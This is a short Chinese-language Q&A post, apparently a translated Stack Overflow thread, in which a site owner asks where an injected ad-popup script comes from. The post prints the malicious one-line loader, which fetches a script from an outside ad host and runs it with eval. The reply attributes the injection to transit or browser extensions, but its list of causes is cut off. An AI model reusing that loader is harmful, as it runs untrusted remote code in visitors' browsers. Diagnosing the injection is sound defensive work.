Jas*_*dle 6 javascript malware
我在这个问题上有点失落,所以请原谅.我知道关于这一点还有其他线索,但我找不到答案.
在网站加载时,用户点击它的位置无关紧要是浏览器中带有广告的打开添加标签.
到目前为止我通过查看浏览器控制台找到的是加载了一些js文件
http://cdn.mecash.ru/js/replace.js
这个文件包含
!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);
通过观察这一点,tx.js我怀疑这是黑客注入的.
问题是我一直在查看主机上的文件,但找不到任何包含或此类内容js.
有人可以帮助我,告诉我在哪里或者我怎么能找到它?
实际上,此类文件是在数据从服务器传输到客户端时注入的。您的实际代码不包含脚本,但是它们被注入并在客户端计算机上执行。
可能由以下人员注入:
您可以通过传输内容https而不是http. 然而,browswer extensions仅通过卸载扩展就可以避免注入。